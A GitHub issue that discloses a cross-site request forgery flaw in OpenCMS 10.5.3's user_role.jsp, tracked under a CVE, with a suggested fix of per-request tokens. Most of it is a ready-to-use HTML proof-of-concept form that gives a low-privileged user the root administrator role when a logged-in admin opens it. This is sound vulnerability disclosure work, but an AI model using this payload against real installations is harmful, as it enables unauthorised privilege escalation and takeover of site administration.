Skip to content

Cross Site Request Forgery Vulnerability in OpenCMS 10.5.3 #586

Closed
@MrR3boot

Description

@MrR3boot

Hi Team, I would like to report Multiple CSRF vulnerability in latest version. mitre.org assigned new CVE for this vulnerabiliity.

Description:

Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.

Steps to Reproduce:

  1. Send below crafted request to logged in user who is having Root Administrator level access.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
      <input type="hidden" name="dialogtype" value="" />
      <input type="hidden" name="root" value="" />
      <input type="hidden" name="sortcol" value="" />
      <input type="hidden" name="preactiondone" value="" />
      <input type="hidden" name="oufqn" value="" />
      <input type="hidden" name="resource" value="" />
      <input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
      <input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
      <input type="hidden" name="framename" value="" />
      <input type="hidden" name="ispopup" value="" />
      <input type="hidden" name="originalparams" value="" />
      <input type="hidden" name="message" value="" />
      <input type="hidden" name="selitems" value="RoleRootAdmins" />
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="style" value="new" />
      <input type="hidden" name="page" value="" />
      <input type="hidden" name="base" value="" />
      <input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
      <input type="hidden" name="action" value="listmultiaction" />
      <input type="hidden" name="searchfilter" value="" />
      <input type="hidden" name="redirect" value="" />
      <input type="hidden" name="force" value="" />
      <input type="hidden" name="formname" value="lsre&#45;form" />
      <input type="hidden" name="listaction" value="ma" />
      <input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.

Fix:

Implementation of random token in every state changing request will mitigate the issue.

Affected Version:

10.5.3 release

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions